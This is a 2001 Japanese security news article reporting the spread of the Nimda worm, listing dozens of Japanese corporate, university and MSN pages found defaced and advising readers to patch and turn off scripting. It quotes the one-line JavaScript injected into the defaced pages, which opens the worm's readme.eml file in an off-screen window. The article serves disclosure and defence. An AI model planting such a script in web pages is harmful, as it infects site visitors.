msn、オリコをはじめとする多数のwebが改竄、感染の踏み台にされる(2001.9.19) | ScanNetSecurity
2024.05.02(木)

msn、オリコをはじめとする多数のwebが改竄、感染の踏み台にされる(2001.9.19)

 Nimda によるweb改竄は、急激に広がっている。
 現在、編集部で確認したwebページは下記であるが、いくつかのサイトでは、トップページ以下複数のページが改竄されるなどの広がりをみせている。大手サイト、企業も感染しており、企業名やサイト名で安心してアクセスす

インシデント・事故 インシデント・情報漏えい
facebookLINE
 Nimda によるweb改竄は、急激に広がっている。
 現在、編集部で確認したwebページは下記であるが、いくつかのサイトでは、トップページ以下複数のページが改竄されるなどの広がりをみせている。大手サイト、企業も感染しており、企業名やサイト名で安心してアクセスすると、被害を受けることになる。インターネット利用にあたっては、パッチをあてる、スクリプトをオフにするなどの自己防衛が不可欠となっている。

改竄されたページには、下記のスクリプトが埋め込まれている。
「<html><script language="JavaScript">window.open("readme.eml",null, "resizable=no,top=6000,left=6000")</script></html>」

 感染したwebは、拡大しており、下記にあげるものは、ごく一部でしかない。

改竄され、踏み台となったweb
 ・msnトップページ
  http://www.msn.co.jp/
 ・オリコ
  http://www.orico.co.jp/
 ・オリコ
  http://www.orico.co.jp/senden/cm/e1.html
 ・山梨学院大学
  http://www.ygu.ac.jp/
 ・山梨学院大学法学部
  http://www.ygu.ac.jp/guide/hougakuseiji/index.html
 ・建設物価メディア株式会社
  http://www.kensetu-bukka-m.co.jp/
 ・建設物価メディア株式会社
  http://www.kensetu-bukka-m.co.jp/rireki/0109_edit_3.htm
 ・株式会社マウント富士インターネット
  http://www.mfi.or.jp/www/
 ・都留信用組合
  http://www.mfi.or.jp/w3/home0/tsurusin/
 ・RESORTHOTEL CAMELOT
  http://www.mfi.or.jp/camelot/main.htm
 ・株式会社ストローカー ジャパン
  http://www.mfi.or.jp/sjc/
 ・日本囲碁ソフト
  布石・定石パワー アップデートモジュールのダウンロード
  http://www.igosoft.co.jp/html/update/jpow2up.html
 ・囲碁ソフト 次の一手
  http://www.igosoft.co.jp/html/UteruNyu/keisan.htm
 ・株式会社エルミックシステム
  http://www.elmic.co.jp/japanese/index.html
 ・株式会社タイリクトラベル
  http://www.tairiku.co.jp/hotel/
 ・株式会社タイリクトラベル TE ANAU テアナウ ホテル料金一覧
  http://www.tairiku.co.jp/hotel/oceania/TEU_trf_A.html
 ・JTB GLOBAL ASSISTANCE
  http://www.jga.co.jp/Indexright.htm
 ・マックスバリュ東北株式会社
  http://www.mv-tohoku.co.jp/
 ・株式会社 日東物産
  http://www.prland.co.jp/
 ・株式会社 日本ユニオンシステム
  http://www.unionsys.co.jp/
 ・代官山美容外科
  http://www.mpint.co.jp/~dky/congress_J.htm
 ・RSoundLibrary
  http://www.crypton.co.jp/Web98/html/10380.html
 ・東京工業大学 井口家成 研究室HP内の個人ページ
  http://www.htsc.ap.titech.ac.jp/member/kawai/test.htm
 ・志學館学園
  http://www.jkajyo.ac.jp/
 ・志學館学園
  http://www.jkajyo.ac.jp/sgn/camp/13kimo.html
 ・キャリアプラザ名古屋支店
  http://www.hito-plaza.com/MM/news010914.htm
 ・早稲田大学 嘉納研究室
  http://www.kano.arch.waseda.ac.jp/

《ScanNetSecurity》

PageTop

アクセスランキング

  1. ランサムウェア被害の原因はスターティア社の UTM テストアカウント削除忘れ

    ランサムウェア被害の原因はスターティア社の UTM テストアカウント削除忘れ

  2. クラウド労務管理「WelcomeHR」の個人データ閲覧可能な状態に、契約終了後も個人情報保存

    クラウド労務管理「WelcomeHR」の個人データ閲覧可能な状態に、契約終了後も個人情報保存

  3. 今日もどこかで情報漏えい 第23回「2024年3月の情報漏えい」なめるなという決意 ここまでやるという矜恃

    今日もどこかで情報漏えい 第23回「2024年3月の情報漏えい」なめるなという決意 ここまでやるという矜恃

  4. 2023年「業務外利用・不正持出」前年 2 倍以上増加 ~ デジタルアーツ調査

    2023年「業務外利用・不正持出」前年 2 倍以上増加 ~ デジタルアーツ調査

  5. クラウド型データ管理システム「ハイクワークス」のユーザー情報に第三者がアクセス可能な状態に

    クラウド型データ管理システム「ハイクワークス」のユーザー情報に第三者がアクセス可能な状態に

  6. 雨庵 金沢で利用している Expedia 社の宿泊予約情報管理システムに不正アクセス、フィッシングサイトへ誘導するメッセージ送信

    雨庵 金沢で利用している Expedia 社の宿泊予約情報管理システムに不正アクセス、フィッシングサイトへ誘導するメッセージ送信

  7. 信和へのランサムウェア攻撃で窃取された情報、ロックビット摘発を受けてリークサイトが閉鎖

    信和へのランサムウェア攻撃で窃取された情報、ロックビット摘発を受けてリークサイトが閉鎖

  8. 「味市春香なごみオンラインショップ」に不正アクセス、16,407件のカード情報が漏えい

    「味市春香なごみオンラインショップ」に不正アクセス、16,407件のカード情報が漏えい

  9. SECON 2024 レポート:最先端のサイバーフィジカルシステムを体感

    SECON 2024 レポート:最先端のサイバーフィジカルシステムを体感

  10. トレーニング 6 年ぶり復活 11/9 ~ 11/15「CODE BLUE 2024」開催

    トレーニング 6 年ぶり復活 11/9 ~ 11/15「CODE BLUE 2024」開催

ランキングをもっと見る
ホーム インシデント・事故 インシデント・情報漏えい 記事
TOP